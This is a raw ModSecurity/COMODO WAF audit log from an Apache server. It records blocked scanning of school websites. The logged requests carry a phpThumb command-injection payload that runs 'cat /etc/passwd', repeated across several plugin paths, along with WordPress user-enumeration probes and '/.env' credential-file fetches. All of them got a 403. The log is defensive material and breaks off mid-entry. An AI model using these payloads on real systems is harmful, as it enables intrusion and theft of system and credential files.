/assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --59923d25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59923d25-E-- --59923d25-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385024973503 1464 (- - -) Stopwatch2: 1747385024973503 1464; combined=508, p1=357, p2=123, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59923d25-Z-- --3bb1285c-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULAAAAAg 103.236.140.4 49434 103.236.140.4 8181 --3bb1285c-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3bb1285c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bb1285c-E-- --3bb1285c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025167366 1642 (- - -) Stopwatch2: 1747385025167366 1642; combined=504, p1=346, p2=127, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bb1285c-Z-- --50da3b3d-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULQAAAAQ 103.236.140.4 49436 103.236.140.4 8181 --50da3b3d-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --50da3b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50da3b3d-E-- --50da3b3d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025361624 1385 (- - -) Stopwatch2: 1747385025361624 1385; combined=474, p1=328, p2=119, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50da3b3d-Z-- --addaf670-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULgAAAAo 103.236.140.4 49438 103.236.140.4 8181 --addaf670-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --addaf670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --addaf670-E-- --addaf670-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025556351 1612 (- - -) Stopwatch2: 1747385025556351 1612; combined=487, p1=332, p2=127, p3=0, p4=0, p5=28, sr=64, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --addaf670-Z-- --106faf61-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKULwAAAAI 103.236.140.4 49440 103.236.140.4 8181 --106faf61-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --106faf61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --106faf61-E-- --106faf61-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025750786 1586 (- - -) Stopwatch2: 1747385025750786 1586; combined=504, p1=330, p2=136, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --106faf61-Z-- --301ca81b-A-- [16/May/2025:15:43:45 +0700] aCb6wde6THFz1hsaJaKUMAAAAAs 103.236.140.4 49442 103.236.140.4 8181 --301ca81b-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --301ca81b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --301ca81b-E-- --301ca81b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747385025945061 1687 (- - -) Stopwatch2: 1747385025945061 1687; combined=568, p1=400, p2=139, p3=0, p4=0, p5=29, sr=97, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --301ca81b-Z-- --a6bdc317-A-- [16/May/2025:16:01:37 +0700] aCb-8de6THFz1hsaJaKUXQAAABQ 103.236.140.4 49718 103.236.140.4 8181 --a6bdc317-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.38.187.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.38.187.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6bdc317-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6bdc317-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386097193132 13661 (- - -) Stopwatch2: 1747386097193132 13661; combined=22332, p1=482, p2=904, p3=0, p4=0, p5=10489, sr=76, sw=0, l=0, gc=10457 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6bdc317-Z-- --d83a457a-A-- [16/May/2025:16:06:05 +0700] aCb__dhEtho3ciA0wegh9wAAAJM 103.236.140.4 49806 103.236.140.4 8181 --d83a457a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.40.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.40.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d83a457a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d83a457a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386365358973 2674 (- - -) Stopwatch2: 1747386365358973 2674; combined=1357, p1=507, p2=818, p3=0, p4=0, p5=31, sr=171, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d83a457a-Z-- --806a4379-A-- [16/May/2025:16:12:02 +0700] aCcBYte6THFz1hsaJaKUhQAAABI 103.236.140.4 49910 103.236.140.4 8181 --806a4379-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.178.121.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.178.121.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --806a4379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --806a4379-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747386722150513 2410 (- - -) Stopwatch2: 1747386722150513 2410; combined=998, p1=370, p2=609, p3=0, p4=0, p5=19, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --806a4379-Z-- --cd9a2932-A-- [16/May/2025:16:26:05 +0700] aCcErUE0LfP59mkCzg73uQAAANI 103.236.140.4 50190 103.236.140.4 8181 --cd9a2932-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.189.2.13 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.189.2.13 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cd9a2932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd9a2932-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747387565385866 764 (- - -) Stopwatch2: 1747387565385866 764; combined=305, p1=266, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd9a2932-Z-- --6cb0dd67-A-- [16/May/2025:16:31:45 +0700] aCcGAce47ocjCGWTS4b7uwAAAEU 103.236.140.4 50264 103.236.140.4 8181 --6cb0dd67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.111.227.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.111.227.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6cb0dd67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb0dd67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747387905405772 3172 (- - -) Stopwatch2: 1747387905405772 3172; combined=1317, p1=459, p2=829, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb0dd67-Z-- --a2c94919-A-- [16/May/2025:16:41:55 +0700] aCcIY0E0LfP59mkCzg732QAAAMk 103.236.140.4 50390 103.236.140.4 8181 --a2c94919-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.93.229.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.93.229.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2c94919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2c94919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747388515102131 3233 (- - -) Stopwatch2: 1747388515102131 3233; combined=1403, p1=483, p2=890, p3=0, p4=0, p5=30, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c94919-Z-- --decbb64b-A-- [16/May/2025:16:47:41 +0700] aCcJvUE0LfP59mkCzg738AAAANM 103.236.140.4 50504 103.236.140.4 8181 --decbb64b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.65.18.197 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.65.18.197 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --decbb64b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --decbb64b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747388861313673 774 (- - -) Stopwatch2: 1747388861313673 774; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --decbb64b-Z-- --f118c463-A-- [16/May/2025:17:25:42 +0700] aCcSpse47ocjCGWTS4YQQQAAAFM 103.236.140.4 41506 103.236.140.4 8181 --f118c463-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.23.207 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.23.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f118c463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f118c463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747391142496378 674 (- - -) Stopwatch2: 1747391142496378 674; combined=304, p1=265, p2=0, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f118c463-Z-- --04f5161f-A-- [16/May/2025:17:38:12 +0700] aCcVlNhEtho3ciA0weg7QgAAAJY 103.236.140.4 49526 103.236.140.4 8181 --04f5161f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.231.7.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04f5161f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f5161f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747391892632309 2139 (- - -) Stopwatch2: 1747391892632309 2139; combined=914, p1=325, p2=566, p3=0, p4=0, p5=23, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f5161f-Z-- --59f04342-A-- [16/May/2025:17:54:42 +0700] aCcZckE0LfP59mkCzg4XkQAAAMY 103.236.140.4 54274 103.236.140.4 8181 --59f04342-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --59f04342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f04342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392882407192 797 (- - -) Stopwatch2: 1747392882407192 797; 